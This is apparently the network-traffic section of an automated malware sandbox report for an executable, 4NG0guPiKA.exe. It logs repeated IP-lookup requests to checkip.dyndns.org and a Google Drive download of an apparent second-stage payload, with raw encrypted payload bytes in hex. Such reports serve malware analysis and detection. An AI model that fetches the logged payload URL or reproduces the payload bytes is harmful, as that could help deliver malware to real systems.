                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:46.862025976 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:47.889677048 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.1049767132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:48.876497984 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:49.825568914 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.1049769132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:50.712588072 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:51.544471025 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:51 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.1049771132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:52.414118052 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:53.242187977 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:53 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.1049773132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:54.373991966 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:55.204922915 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.1049775132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:56.003343105 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:56.822174072 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:56 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.1049777132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:57.727060080 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:58.555742025 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:58 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.1049779132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:59.554446936 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:07:00.358151913 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:07:00 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.1049781132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:07:01.469693899 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:07:02.299186945 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:07:02 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          37192.168.2.1049783132.226.8.16980
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:07:05.869218111 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:07:06.698160887 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:07:06 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.1049708142.250.181.2384438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:22 UTC216OUTGET /uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-11 02:05:23 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Sat, 11 Jan 2025 02:05:23 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-_0gKzAoKXAfhtMxwpj2GHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.1049709142.250.186.334438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:05:23 UTC258OUTGET /download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:05:26 UTC4933INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgTL66myTrSqkgkQ8pdmcnFSHAF-PDMvhZiQnxFiZgeSztGcTPy6ZGgMh3Wu-8xbkYx9
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="GpennlcqClLC4.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Wed, 04 Dec 2024 05:24:29 GMT
                                                                                                          Date: Sat, 11 Jan 2025 02:05:26 GMT
                                                                                                          Expires: Sat, 11 Jan 2025 02:05:26 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=NRB2Aw==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-11 02:05:26 UTC4933INData Raw: a7 e5 b5 dd f1 13 86 5b bc c0 e5 d1 62 b4 20 9d 5c ba 0d 6c 1e 19 9b cc bb 43 42 d1 d8 d7 1d 96 7a 19 dd 57 e5 f2 72 c3 58 c1 c7 9d d0 16 b6 a5 1e 69 f1 12 f2 1f f3 0c 19 a0 ab ca d0 13 ff c5 67 3e 59 93 a5 8f 3f e6 f0 13 79 49 be 47 92 24 cb 00 4f b1 8b 4e ba c3 f0 1e e3 85 bf f8 15 df 38 57 17 b4 d2 08 4e a3 ed 36 13 6d 35 19 bc e9 c7 06 c1 59 c7 78 bc d5 88 7f 3f 47 fc 17 af b0 ab 0c 87 f0 40 7d 57 b2 1b 58 56 95 23 fe 22 34 4d b4 3f 81 13 a9 69 27 c9 43 2f a7 b3 65 2c fb 52 7e 4a 3e f8 b0 d0 2b e1 97 89 cd d4 88 c1 39 7f de b1 6a a0 cc 05 7a 57 34 d7 62 c5 01 0a 6f 06 5e 45 1b bb 40 a5 bd 98 d1 ef f4 4b df 93 25 7b dd d6 e0 9b 20 17 ac 68 d6 31 93 57 ee a4 20 da 8e d0 96 74 92 46 40 9d 5f 27 b3 b6 1d f3 f4 04 a1 1d ff 3a 3d 26 96 4a 26 4b 88 e8 94 90
                                                                                                          Data Ascii: [b \lCBzWrXig>Y?yIG$ON8WN6m5Yx?G@}WXV#"4M?i'C/e,R~J>+9jzW4bo^E@K%{ h1W tF@_':=&J&K
                                                                                                          2025-01-11 02:05:26 UTC4832INData Raw: 5d 53 a1 d7 b2 18 4c 2e 91 c1 1b 2c ad 72 cf 83 21 38 35 d9 85 e6 bb fd ee 6a 56 95 0c 0f e4 89 d6 da 87 d5 0e c5 6c ba 68 9a a7 9a 5a 1b 3c c0 d4 54 25 5a 5e cb 1d 89 c1 53 f7 d1 00 b1 f8 61 5e c8 02 68 96 68 6c e4 56 08 64 e6 59 cf 54 00 fc 95 f0 eb ba c5 17 99 40 88 ba 91 04 9a 52 f8 90 ed 56 e1 19 3d a5 09 b6 1e 02 cf 6c ed a5 6b 7f 51 cd e2 09 72 9d 59 b8 b7 7c 17 9d 59 69 60 c5 53 d1 cf 40 b9 c1 c1 a4 ea 5b a7 6c 61 55 f9 51 94 a3 ed c0 e4 b9 ec a7 8c 93 b3 0b 00 86 4f 40 28 48 44 78 1b 3d f1 d5 e6 cc 66 b1 b3 c6 01 dd 5c 1c 5f 79 0b f8 de 0d df 8b c9 5c e7 75 96 85 f7 36 bb 31 73 38 69 21 7b 19 0e 78 9d e7 93 93 b6 7f 48 1b 24 b3 b5 02 89 be 48 3d 22 4f 86 74 37 45 9a 01 0a c5 b8 5f 3f 32 51 7c f7 55 a0 ee bf 6a d2 2d 1a 48 72 4c 17 c3 d5 40 93 bc
                                                                                                          Data Ascii: ]SL.,r!85jVlhZ<T%Z^Sa^hhlVdYT@RV=lkQrY|Yi`S@[laUQO@(HDx=f\_y\u61s8i!{xH$H="Ot7E_?2Q|Uj-HrL@
                                                                                                          2025-01-11 02:05:26 UTC1323INData Raw: 0d 87 08 aa a0 75 57 a4 9d 5e 05 ff 71 b0 5d fd 2e 10 74 dd a8 67 69 3a fb fa 66 34 11 07 50 40 42 5c 23 b1 f9 ad cd 6f de 47 02 2c 93 5b 0c 37 6f 80 48 64 35 69 73 e2 9b 15 74 61 b0 5b 38 a7 dc 59 5b 6b af 98 93 38 34 db d6 0f 0c 95 bd cd c1 b8 75 a4 e7 70 7d 42 75 ca eb 53 cf 62 ee 93 2b 11 d1 f4 c1 0c e9 17 ee 00 dc f6 ec da 8c 48 83 2c 61 4f 0a e1 4c 11 5c 63 19 e2 b0 d2 ff 6d 0d 51 10 90 8b 0f a4 cb f8 42 f2 45 0e 9e 7e 15 59 da 07 62 48 84 3d 2c 72 50 78 18 91 fd f8 16 90 10 22 58 53 eb 62 89 05 9e b1 19 78 d8 42 2d 10 04 97 47 e3 84 06 80 c3 b3 de ec dd a2 9f 9b 8d 19 06 e4 d2 7a 77 63 24 b4 45 80 8f f0 0e 61 db f1 92 18 63 5c 66 70 77 dc ef c2 6a 9f eb 7f f9 52 8a b6 40 5b 81 88 f1 4f 95 bb e5 60 11 3a 68 79 c7 75 d6 69 b4 12 90 42 12 5a 69 8b 80
                                                                                                          Data Ascii: uW^q].tgi:f4P@B\#oG,[7oHd5ista[8Y[k84up}BuSb+H,aOL\cmQBE~YbH=,rPx"XSbxB-Gzwc$Eac\fpwjR@[O`:hyuiBZi
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: af 2d fc bc d2 94 e4 41 5d f2 d0 da 53 82 b1 3f c1 1f 9d 3f 4f c2 3a 90 79 09 fe a4 97 ce 55 1a b1 29 34 13 9b 53 ff a1 1f 67 ba 4d b5 71 02 ec 8e 08 bd 5c 9e 90 1d 0f 89 e3 3e a7 fb 71 16 6f 6e 26 6b 5d be b5 ed 6b db 44 e1 48 0e 81 68 c0 90 92 df 8d e0 ae 1a 16 d4 b3 2f b0 fb 97 d2 3c 07 25 65 1d 11 9d 13 f4 b4 85 36 98 90 01 dc 75 1f 47 8f 68 e2 66 0c 9d 0d a4 02 6e cb 29 a3 ab aa db 6b 27 bd 49 71 46 ed b4 a1 fb 2e 6f 7d d2 c8 d6 77 18 b9 3c ce 6e 2e 95 7b c5 9e 85 74 ec f2 10 6a f0 c6 46 e3 4a 30 76 f5 b9 db 90 e7 65 d0 7c 76 19 76 bb 0d 21 05 7a f8 44 a4 fd 8f 68 64 21 bf 23 40 c6 e8 83 fa 18 14 08 6f 1b 1d 16 fb da 34 d3 33 3d cd 6b 60 84 27 0a 3d 9a fe b0 5a 65 91 77 f7 52 7f 46 40 88 6a a8 8f 35 fa 44 0a 35 3a c2 e7 d7 4d ed 04 98 f5 ae 7f be bd
                                                                                                          Data Ascii: -A]S??O:yU)4SgMq\>qon&k]kDHh/<%e6uGhfn)k'IqF.o}w<n.{tjFJ0ve|vv!zDhd!#@o43=k`'=ZewRF@j5D5:M
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: cd 79 5d 58 34 cb e0 b3 9d 37 4f e8 84 e0 a3 2b 7e d9 ef f7 e3 0a a7 9a be ea b9 12 f0 fc 3a 9b f3 cf 5f c6 ba 10 fb 71 a2 5f f4 c9 0b cc 7a 8d 11 6c 11 d2 d5 ca ed 3c aa 5b 42 09 ff 21 bc 17 26 a1 9e f5 87 c2 b5 79 59 cb b1 83 75 17 03 a8 15 50 42 cf 02 1a e3 af 8f f1 80 70 73 4f 05 2f ae c7 c9 10 e5 85 b7 c4 28 99 ff 78 ed 17 5b 5c b2 bb 11 81 d1 b1 d5 2c 1f fe b9 f6 03 da 6d 48 4e 03 fa cd 4a ab 6f 15 a4 18 cd 0c 61 8a 79 b9 21 b2 ee 01 73 27 66 8c 54 f1 96 f3 d0 ea 8c 56 1c ae 2f 11 b9 1e 25 3f 65 07 9a 83 2e 25 49 68 dd 27 5d 04 e8 f2 dd 40 df a4 17 c4 84 6d a4 2e f9 34 77 9c 46 cb 2b 94 ba 19 1f 1b f0 8e 0b 90 5a 3e fa 4e 52 6f b6 c2 6c cd ae f9 62 3b 7a db 8c 8e 4a 3f e6 fe 3b 37 49 41 b2 81 32 01 e2 4a b1 fb 5d 9a d2 a6 6c 61 9f bf 88 7a 2c 38 57
                                                                                                          Data Ascii: y]X47O+~:_q_zl<[B!&yYuPBpsO/(x[\,mHNJoay!s'fTV/%?e.%Ih']@m.4wF+Z>NRolb;zJ?;7IA2J]laz,8W
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: ae 03 68 5c 70 2d 0c 91 2f 67 45 78 c9 23 77 19 30 04 33 56 e9 97 5d 63 d7 03 a1 5d 82 a0 2a 68 65 15 f9 08 6c dd 3e 18 51 fb 4b 3b f8 b0 9e d1 55 67 37 20 c3 0a 55 3c 34 00 52 2d 98 55 b6 6a 31 58 75 80 46 33 45 aa ca f0 e7 ed d0 1a 77 10 3d 28 2f 81 44 c2 57 00 5a f4 5b 48 a7 b8 49 77 c5 24 82 c3 3d 66 b4 6c a8 73 48 57 b5 f1 bf ec bb fe 92 15 47 9c 72 92 9a 9b d7 c9 89 ec 8f aa 91 b0 68 4e b8 91 42 3c 28 c5 aa 59 09 43 45 c1 ae a9 d2 76 d5 f5 6f 4e f2 72 50 a7 2a 3b 96 62 4e 53 41 0a 6e ea 59 cf 54 6f ec fa 70 ef c8 99 0f 94 21 93 bf a0 da 8d 49 e6 1b fd 45 e4 09 14 91 03 bf 6b 13 cf 1f 60 ca 6a 75 42 c1 f3 d3 04 0d 30 a3 69 18 40 8a 8f ee 56 4b 53 d0 d6 47 a0 dc bf 2c fc 53 23 7b 5b 8f d1 33 fb 33 e7 c0 ee a8 fa b5 b2 2a 54 0b 0a fe 2c 4f f6 18 49 66
                                                                                                          Data Ascii: h\p-/gEx#w03V]c]*hel>QK;Ug7 U<4R-Uj1XuF3Ew=(/DWZ[HIw$=flsHWGrhNB<(YCEvoNrP*;bNSAnYTop!IEk`juB0i@VKSG,S#{[33*T,OIf
